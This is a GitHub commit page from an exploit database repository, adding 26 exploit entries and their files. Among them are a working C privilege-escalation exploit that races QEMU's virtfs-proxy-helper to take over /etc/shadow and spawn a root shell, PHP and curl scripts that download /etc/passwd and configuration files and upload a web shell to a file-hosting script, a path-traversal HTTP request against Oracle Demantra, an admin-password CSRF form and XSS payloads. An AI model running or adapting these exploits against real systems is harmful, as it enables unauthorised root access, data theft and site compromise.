Skip to content

Commit 4ac8afe

Browse files
author
Offensive Security
committed
DB: 2015-12-18
26 new exploits
1 parent cc15679 commit 4ac8afe

27 files changed

Lines changed: 915 additions & 0 deletions

File tree

files.csv

Lines changed: 26 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -35239,6 +35239,7 @@ id,file,description,date,author,platform,type,port
3523935239
38981,platforms/php/webapps/38981.txt,"Ovidentia absences Module 2.64 - Remote File Inclusion",2015-12-15,bd0rk,php,webapps,80
3524035240
38982,platforms/jsp/remote/38982.rb,"ManageEngine Desktop Central 9 FileUploadServlet ConnectionId Vulnerability",2015-12-15,metasploit,jsp,remote,8020
3524135241
38983,platforms/java/remote/38983.rb,"Jenkins CLI RMI Java Deserialization Vulnerability",2015-12-15,metasploit,java,remote,8080
35242+
38984,platforms/php/webapps/38984.txt,"Tequila File Hosting 1.5 - Multiple Vulnerabilities",2015-12-15,"Ashiyane Digital Security Team",php,webapps,80
3524235243
38985,platforms/php/webapps/38985.txt,"Dredge School Administration System /DSM/loader.php Id Parameter SQL Injection",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0
3524335244
38986,platforms/php/webapps/38986.txt,"Dredge School Administration System /DSM/loader.php Account Information Disclosure",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0
3524435245
38987,platforms/php/webapps/38987.html,"Dredge School Administration System /DSM/loader.php Admin Account Manipulation CSRF",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0
@@ -35261,3 +35262,28 @@ id,file,description,date,author,platform,type,port
3526135262
39005,platforms/multiple/dos/39005.txt,"Wireshark - AirPDcapPacketProcess Stack-Based Buffer Overflow",2015-12-16,"Google Security Research",multiple,dos,0
3526235263
39006,platforms/multiple/dos/39006.txt,"Wireshark - getRate Stack-Based Out-of-Bounds Read",2015-12-16,"Google Security Research",multiple,dos,0
3526335264
39007,platforms/java/remote/39007.txt,"FireEye Wormable Remote Code Execution in MIP JAR Analysis",2015-12-16,"Tavis Ormandy and Natalie Silvanovich",java,remote,0
35265+
39008,platforms/windows/remote/39008.py,"Easy File Sharing Web Server 7.2 - GET HTTP Request SEH Buffer Overflow",2015-12-16,ArminCyber,windows,remote,80
35266+
39009,platforms/windows/remote/39009.py,"Easy File Sharing Web Server 7.2 - HEAD HTTP Request SEH Buffer Overflow",2015-12-16,ArminCyber,windows,remote,80
35267+
39010,platforms/linux/local/39010.c,"Gentoo Local Priv Escalation in QEMU",2015-12-17,zx2c4,linux,local,0
35268+
39011,platforms/php/webapps/39011.txt,"UAEPD Shopping Script /products.php Multiple Parameter SQL Injection",2014-01-08,"AtT4CKxT3rR0r1ST ",php,webapps,0
35269+
39012,platforms/php/webapps/39012.txt,"UAEPD Shopping Script /news.php id Parameter SQL Injection",2014-01-08,"AtT4CKxT3rR0r1ST ",php,webapps,0
35270+
39013,platforms/php/webapps/39013.html,"Built2Go PHP Shopping Admin Password Cross Site Request Forgery Vulnerability",2014-01-08,"AtT4CKxT3rR0r1ST ",php,webapps,0
35271+
39014,platforms/php/webapps/39014.txt,"EZGenerator Local File Disclosure and Cross Site Request Forgery Vulnerabilities",2014-01-08,"AtT4CKxT3rR0r1ST ",php,webapps,0
35272+
39015,platforms/php/webapps/39015.txt,"Atmail Webmail Server Email Body HTML Injection Vulnerability",2014-01-14,"Zhao Liang",php,webapps,0
35273+
39016,platforms/php/webapps/39016.txt,"Joomla! Almond Classifieds Component Arbitrary File Upload Vulnerability",2014-01-10,DevilScreaM,php,webapps,0
35274+
39017,platforms/php/webapps/39017.txt,"Zen Cart 1.5.4 - Local File Inclusion",2015-12-17,"High-Tech Bridge SA",php,webapps,80
35275+
39018,platforms/multiple/remote/39018.txt,"Oracle Supply Chain Products Suite Remote Security Vulnerability",2014-01-14,Oracle,multiple,remote,0
35276+
39019,platforms/windows/dos/39019.txt,"Adobe Flash TextField.antiAliasType Setter - Use-After-Free",2015-12-17,"Google Security Research",windows,dos,0
35277+
39020,platforms/windows/dos/39020.txt,"Adobe Flash TextField.gridFitType Setter - Use-After-Free",2015-12-17,"Google Security Research",windows,dos,0
35278+
39021,platforms/windows/dos/39021.txt,"Adobe Flash MovieClip.lineStyle - Use-After-Frees",2015-12-17,"Google Security Research",windows,dos,0
35279+
39022,platforms/windows/dos/39022.txt,"Adobe Flash GradientFill - Use-After-Frees",2015-12-17,"Google Security Research",windows,dos,0
35280+
39023,platforms/android/dos/39023.txt,"Samsung Galaxy S6 Samsung Gallery - GIF Parsing Crash",2015-12-17,"Google Security Research",android,dos,0
35281+
39024,platforms/android/dos/39024.txt,"Samsung Galaxy S6 Samsung Gallery - Bitmap Decoding Crash",2015-12-17,"Google Security Research",android,dos,0
35282+
39025,platforms/windows/dos/39025.txt,"Windows Kernel win32k!OffsetChildren - Null Pointer Dereference",2015-12-17,"Nils Sommer",windows,dos,0
35283+
39026,platforms/win32/dos/39026.txt,"win32k Desktop and Clipboard - Null Pointer Derefence",2015-12-17,"Nils Sommer",win32,dos,0
35284+
39027,platforms/win32/dos/39027.txt,"win32k Clipboard Bitmap - Use-After-Free Vulnerability",2015-12-17,"Nils Sommer",win32,dos,0
35285+
39028,platforms/php/webapps/39028.txt,"Joomla! Sexy Polling Extension 'answer_id' Parameter SQL Injection Vulnerability",2014-01-16,"High-Tech Bridge",php,webapps,0
35286+
39029,platforms/php/webapps/39029.txt,"bloofoxCMS /bloofox/index.php username Parameter SQL Injection",2014-01-17,"AtT4CKxT3rR0r1ST ",php,webapps,0
35287+
39030,platforms/php/webapps/39030.txt,"bloofoxCMS /bloofox/admin/index.php username Parameter SQL Injection",2014-01-17,"AtT4CKxT3rR0r1ST ",php,webapps,0
35288+
39031,platforms/php/webapps/39031.html,"bloofoxCMS /admin/index.php Admin User Creation CSRF",2014-01-17,"AtT4CKxT3rR0r1ST ",php,webapps,0
35289+
39032,platforms/php/webapps/39032.txt,"bloofoxCMS /admin/include/inc_settings_editor.php fileurl Parameter Local File Inclusion",2014-01-17,"AtT4CKxT3rR0r1ST ",php,webapps,0

platforms/android/dos/39023.txt

Lines changed: 31 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,31 @@
1+
Source: https://code.google.com/p/google-security-research/issues/detail?id=500
2+
3+
There is a crash when the Samsung Gallery application load the attached GIF, colormap.gif.
4+
5+
D/skia (10905): GIF - Parse error
6+
D/skia (10905): --- decoder->decode returned false
7+
F/libc (10905): Fatal signal 11 (SIGSEGV), code 2, fault addr 0x89f725ac in tid 11276 (thread-pool-0)
8+
I/DEBUG ( 2958): pid: 10905, tid: 11276, name: thread-pool-0 >>> com.sec.android.gallery3d <<<
9+
I/DEBUG ( 2958): signal 11 (SIGSEGV), code 2 (SEGV_ACCERR), fault addr 0x89f725ac
10+
I/DEBUG ( 2958): x0 0000000000000001 x1 0000000089f725ac x2 0000000000000000 x3 00000000fff9038c
11+
I/DEBUG ( 2958): x4 0000007f9c300000 x5 000000000000001f x6 0000000000000001 x7 0000007f9c620048
12+
I/DEBUG ( 2958): x8 0000000000000000 x9 0000000000000000 x10 0000000000000080 x11 0000000000003758
13+
I/DEBUG ( 2958): x12 0000000000000020 x13 0000000000000020 x14 00000000000000a5 x15 000000000000001f
14+
I/DEBUG ( 2958): x16 00000000ffffe4e3 x17 00000000000000a5 x18 0000007f9c300000 x19 0000007f9c61fc00
15+
I/DEBUG ( 2958): x20 0000007f9c664080 x21 0000000089e76b2c x22 000000000000003b x23 0000000000000001
16+
I/DEBUG ( 2958): x24 0000000000000020 x25 0000000000000020 x26 0000000000000020 x27 0000007f9c664080
17+
I/DEBUG ( 2958): x28 00000000000001da x29 0000000032e89ae0 x30 0000007faad70e64
18+
I/DEBUG ( 2958): sp 0000007f9cfff170 pc 0000007faad72dbc pstate 0000000080000000
19+
I/DEBUG ( 2958):
20+
I/DEBUG ( 2958): backtrace:
21+
I/DEBUG ( 2958): #00 pc 000000000002ddbc /system/lib64/libSecMMCodec.so (ColorMap+200)
22+
I/DEBUG ( 2958): #01 pc 000000000002be60 /system/lib64/libSecMMCodec.so (decodeGIF+340)
23+
I/DEBUG ( 2958): #02 pc 000000000000c90c /system/lib64/libSecMMCodec.so (Java_com_sec_samsung_gallery_decoder_SecMMCodecInterface_nativeDecode+436)
24+
I/DEBUG ( 2958): #03 pc 000000000042ec00 /system/priv-app/SecGallery2015/arm64/SecGallery2015.odex
25+
26+
To reproduce, download the file and open it in Gallery
27+
28+
29+
Proof of Concept:
30+
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39023.zip
31+

platforms/android/dos/39024.txt

Lines changed: 33 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,33 @@
1+
Source: https://code.google.com/p/google-security-research/issues/detail?id=497
2+
3+
Loading the bitmap bmp_memset.bmp can cause a crash due to a memset writing out of bounds.
4+
5+
I/DEBUG ( 2961): pid: 12383, tid: 12549, name: thread-pool-1 >>> com.sec.android.gallery3d <<<
6+
I/DEBUG ( 2961): signal 11 (SIGSEGV), code 2 (SEGV_ACCERR), fault addr 0x89e84000
7+
8+
I/DEBUG ( 2961): x0 0000000089e8117c x1 00000000000000ff x2 00000000177fe13c x3 0000000089e8117c
9+
I/DEBUG ( 2961): x4 0000000000000004 x5 0000007f65f42300 x6 0000000000000002 x7 ffffffffffffffff
10+
I/DEBUG ( 2961): x8 0000000089e83ff0 x9 0000007f65f020b0 x10 000000000000003c x11 000000000000003b
11+
I/DEBUG ( 2961): x12 0000007f65f02080 x13 00000000ffffffff x14 0000007f65f02080 x15 00000000000061e0
12+
I/DEBUG ( 2961): x16 0000007f6baccc10 x17 0000007f958f8d80 x18 0000007f9596da40 x19 0000007f65f0e180
13+
I/DEBUG ( 2961): x20 0000007f65f54020 x21 00000000002f0020 x22 0000000000000020 x23 0000000005e00400
14+
I/DEBUG ( 2961): x24 0000000000000004 x25 0000007f65f42300 x26 0000000000000020 x27 0000007f65f52080
15+
I/DEBUG ( 2961): x28 00000000000001da x29 0000000013071460 x30 0000007f6ba7e40c
16+
I/DEBUG ( 2961): sp 0000007f66796130 pc 0000007f958f8e28 pstate 0000000020000000
17+
I/DEBUG ( 2961):
18+
I/DEBUG ( 2961): backtrace:
19+
I/InjectionManager(12532): Inside getClassLibPath caller
20+
I/DEBUG ( 2961): #00 pc 0000000000019e28 /system/lib64/libc.so (memset+168)
21+
I/DEBUG ( 2961): #01 pc 0000000000030408 /system/lib64/libSecMMCodec.so (sbmpd_decode_rle_complete+64)
22+
I/DEBUG ( 2961): #02 pc 0000000000033440 /system/lib64/libSecMMCodec.so (DecodeFile+120)
23+
I/DEBUG ( 2961): #03 pc 000000000000c90c /system/lib64/libSecMMCodec.so (Java_com_sec_samsung_gallery_decoder_SecMMCodecInterface_nativeDecode+436)
24+
I/DEBUG ( 2961): #04 pc 000000000042ec00 /system/priv-app/SecGallery2015/arm64/SecGallery2015.odex
25+
26+
To reproduce, download the file and open it in Gallery.
27+
28+
This issue was tested on a SM-G925V device running build number LRX22G.G925VVRU1AOE2.
29+
30+
31+
Proof of Concept:
32+
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39024.zip
33+

platforms/linux/local/39010.c

Lines changed: 97 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,97 @@
1+
2+
/* == virtfshell ==
3+
*
4+
* Some distributions make virtfs-proxy-helper from QEMU either SUID or
5+
* give it CAP_CHOWN fs capabilities. This is a terrible idea. While
6+
* virtfs-proxy-helper makes some sort of flimsy check to make sure
7+
* its socket path doesn't already exist, it is vulnerable to TOCTOU.
8+
*
9+
* This should spawn a root shell eventually on vulnerable systems.
10+
*
11+
* - zx2c4
12+
* 2015-12-12
13+
*
14+
*
15+
* zx2c4@thinkpad ~ $ lsb_release -i
16+
* Distributor ID: Gentoo
17+
* zx2c4@thinkpad ~ $ ./virtfshell
18+
* == Virtfshell - by zx2c4 ==
19+
* [+] Trying to win race, attempt 749
20+
* [+] Chown'd /etc/shadow, elevating to root
21+
* [+] Cleaning up
22+
* [+] Spawning root shell
23+
* thinkpad zx2c4 # whoami
24+
* root
25+
*
26+
*/
27+
28+
#include <stdio.h>
29+
#include <sys/wait.h>
30+
#include <sys/stat.h>
31+
#include <sys/types.h>
32+
#include <sys/inotify.h>
33+
#include <unistd.h>
34+
#include <stdlib.h>
35+
#include <signal.h>
36+
37+
38+
static int it_worked(void)
39+
{
40+
struct stat sbuf = { 0 };
41+
stat("/etc/shadow", &sbuf);
42+
return sbuf.st_uid == getuid() && sbuf.st_gid == getgid();
43+
}
44+
45+
int main(int argc, char **argv)
46+
{
47+
int fd;
48+
pid_t pid;
49+
char uid[12], gid[12];
50+
size_t attempts = 0;
51+
52+
sprintf(uid, "%d", getuid());
53+
sprintf(gid, "%d", getgid());
54+
55+
printf("== Virtfshell - by zx2c4 ==\n");
56+
57+
printf("[+] Beginning race loop\n");
58+
59+
while (!it_worked()) {
60+
printf("\033[1A\033[2K[+] Trying to win race, attempt %zu\n", ++attempts);
61+
fd = inotify_init();
62+
unlink("/tmp/virtfshell/sock");
63+
mkdir("/tmp/virtfshell", 0777);
64+
inotify_add_watch(fd, "/tmp/virtfshell", IN_CREATE);
65+
pid = fork();
66+
if (pid == -1)
67+
continue;
68+
if (!pid) {
69+
close(0);
70+
close(1);
71+
close(2);
72+
execlp("virtfs-proxy-helper", "virtfs-proxy-helper", "-n", "-p", "/tmp", "-u", uid, "-g", gid, "-s", "/tmp/virtfshell/sock", NULL);
73+
_exit(1);
74+
}
75+
read(fd, 0, 0);
76+
unlink("/tmp/virtfshell/sock");
77+
symlink("/etc/shadow", "/tmp/virtfshell/sock");
78+
close(fd);
79+
kill(pid, SIGKILL);
80+
wait(NULL);
81+
}
82+
83+
printf("[+] Chown'd /etc/shadow, elevating to root\n");
84+
85+
system( "cp /etc/shadow /tmp/original_shadow;"
86+
"sed 's/^root:.*/root::::::::/' /etc/shadow > /tmp/modified_shadow;"
87+
"cat /tmp/modified_shadow > /etc/shadow;"
88+
"su -c '"
89+
" echo [+] Cleaning up;"
90+
" cat /tmp/original_shadow > /etc/shadow;"
91+
" chown root:root /etc/shadow;"
92+
" rm /tmp/modified_shadow /tmp/original_shadow;"
93+
" echo [+] Spawning root shell;"
94+
" exec /bin/bash -i"
95+
"'");
96+
return 0;
97+
}

platforms/multiple/remote/39018.txt

Lines changed: 23 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,23 @@
1+
source: http://www.securityfocus.com/bid/64836/info
2+
3+
Oracle Supply Chain Products Suite is prone to a remote vulnerability in Oracle Demantra Demand Management.
4+
5+
The vulnerability can be exploited over the 'HTTP' protocol. The 'DM Others' sub component is affected.
6+
7+
Attackers can exploit this issue to obtain sensitive information.
8+
9+
This vulnerability affects the following supported versions:
10+
12.2.0, 12.2.1, 12.2.2
11+
12+
POST /demantra/common/loginCheck.jsp/../../GraphServlet HTTP/1.1
13+
Host: target.com:8080
14+
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:22.0) Gecko/20100101 Firefox/22.0
15+
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
16+
Accept-Language: en-US,en;q=0.5
17+
Accept-Encoding: gzip, deflate
18+
DNT: 1
19+
Connection: keep-alive
20+
Content-Type: application/x-www-form-urlencoded
21+
Content-Length: 46
22+
23+
filename=C:/Program Files (x86)/Oracle Demantra Spectrum/Collaborator/demantra/WEB-INF/web.xml

platforms/php/webapps/38984.txt

Lines changed: 132 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,132 @@
1+
================================================================================
2+
Tequila File Hosting Arbitrary File Download
3+
================================================================================
4+
# Vendor Homepage: http://codecanyon.net/item/tequila-file-hosting-script/7604312
5+
# Date: 16/12/2015
6+
# Author: Ashiyane Digital Security Team
7+
# Version: 1.5
8+
# Contact: hehsan979@gmail.com
9+
# Source: http://ehsansec.ir/advisories/tequila-disclose.txt
10+
================================================================================
11+
# Description:
12+
Tequila is a solid, safe, fast, simple and intuitive script which
13+
allows companies or individuals to upload, manage and share their
14+
files online. It is studied in every feature and was produced with
15+
attention to every detail.
16+
17+
# PoC :
18+
19+
# Download Config
20+
http://localhost/tequila/download.php?download.php?filename=files/../include/php/constants.php&name=file.php
21+
22+
# Download passwd
23+
http://localhost/tequila/download.php?filename=files/../../../../../etc/passwd&name=passwd
24+
25+
26+
# (PHP Exploit):
27+
28+
<?php
29+
// page : download.php
30+
echo "Tequila File Hosting Arbitrary File Download Exploiter\n";
31+
echo "Discoverd By Ehsan Hosseini\n\n\n";
32+
$ch = curl_init();
33+
curl_setopt($ch, CURLOPT_URL,
34+
"http://SERVER/download.php?filename=files/../include/php/constants.php&name=file.php");
35+
curl_setopt($ch, CURLOPT_HTTPGET, 1);
36+
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE
37+
5.01; Windows NT 5.0)");
38+
$buf = curl_exec ($ch);
39+
curl_close($ch);
40+
unset($ch);
41+
echo $buf;
42+
?>
43+
44+
# Vulnerabile code:
45+
46+
<?php
47+
//This script forces the download of the file
48+
49+
//Retrieving the file name from the querystring
50+
//and the stepping stone path to the download folder
51+
$fn = (isset($_GET['filename']) ? $_GET['filename'] : false);
52+
$file = $fn;
53+
$sn = (isset($_GET['name']) ? $_GET['name'] : false);
54+
$secure_name = $sn;
55+
56+
if (strpos($file, "files/") !== false) {
57+
$checkdownload = "true";
58+
} else {
59+
$checkdownload = "false";
60+
}
61+
62+
//I verify that the file exists
63+
if($checkdownload == "true"){
64+
if (!file_exists($file)) {
65+
//If there is mold an error
66+
echo "The file does not exist!";
67+
} else {
68+
//If the file exists ...
69+
//Imposed on the header of the page to force the download of the file
70+
header("Cache-Control: public");
71+
header("Content-Description: File Transfer");
72+
header('Content-Type: application/zip');
73+
header("Content-Disposition: attachment; filename= " . $secure_name);
74+
header("Content-Transfer-Encoding: binary");
75+
header('Connection: Keep-Alive');
76+
header('Expires: 0');
77+
header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
78+
header('Pragma: public');
79+
//I read the contents of the file
80+
readfile($file);
81+
exit;
82+
}
83+
}
84+
?>
85+
86+
#######################################################################
87+
88+
================================================================================
89+
Tequila File Hosting Unrestricted File Upload
90+
================================================================================
91+
92+
# PoC :
93+
First register in the site===>
94+
http://localhost/tequila/register.php
95+
96+
Next using this exploit :
97+
98+
<?php
99+
// page : upload.php
100+
$postData = array('folder' => '/username', 'file' => '@shell.php');
101+
$ch = curl_init();
102+
curl_setopt($ch, CURLOPT_URL, "http://localhost/tequila/upload.php");
103+
curl_setopt($ch, CURLOPT_POST, 1);
104+
curl_setopt($ch, CURLOPT_POSTFIELDS, $postData );
105+
$buf = curl_exec ($ch);
106+
curl_close($ch);
107+
unset($ch);
108+
echo $buf;
109+
?>
110+
111+
or
112+
113+
curl -i -F folder='/ehsann' -F file=@ehsan.png
114+
http://localhost/tequila/upload.php
115+
116+
Sheller uploaded.
117+
118+
Path of shell : http://localhost/tequila/files/username/shell.php
119+
120+
#######################################################################
121+
122+
================================================================================
123+
Tequila File Hosting Coss Site Scripting
124+
================================================================================
125+
126+
# PoC :
127+
http://localhost/files.php?folder="><script>alert('Ehsan')</script>
128+
http://easyhost.me/file.php?file="><script>alert('Ehsan')</script>
129+
130+
================================================================================
131+
# Discovered By : Ehsan Hosseini (EhsanSec.ir)
132+
================================================================================

platforms/php/webapps/39011.txt

Lines changed: 7 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,7 @@
1+
source: http://www.securityfocus.com/bid/64734/info
2+
3+
UAEPD Shopping Cart Script is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
4+
5+
An attacker can exploit these issues by manipulating the SQL query logic to carry out unauthorized actions on the underlying database.
6+
7+
http://www.example.com/products.php?cat_id=4

platforms/php/webapps/39012.txt

Lines changed: 7 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,7 @@
1+
source: http://www.securityfocus.com/bid/64734/info
2+
3+
UAEPD Shopping Cart Script is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
4+
5+
An attacker can exploit these issues by manipulating the SQL query logic to carry out unauthorized actions on the underlying database.
6+
7+
http://www.example.com/news.php?id=1

platforms/php/webapps/39013.html

Lines changed: 14 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,14 @@
1+
source: http://www.securityfocus.com/bid/64735/info
2+
3+
Built2Go PHP Shopping is prone to a cross-site request-forgery vulnerability.
4+
5+
Exploiting the issue will allow a remote attacker to use a victim's currently active session to change the victim's password. Successful exploits will compromise affected computers.
6+
7+
<form method=�POST� name=�form0? action=� http://www.example.com/adminpanel/edit_admin.php�>
8+
<input type=�hidden� name=�userid� value=�ADMIN�/>
9+
<input type=�hidden� name=�pass� value=�12121212?/>
10+
<input type=�hidden� name=�retypepass� value=�12121212?/>
11+
<input type=�hidden� name=�addnew� value=�1?/>
12+
<input type=�hidden� name=�action� value=�save�/>
13+
<input type=�hidden� name=�new� value=�Submit�/>
14+
</form>

0 commit comments

Comments
 (0)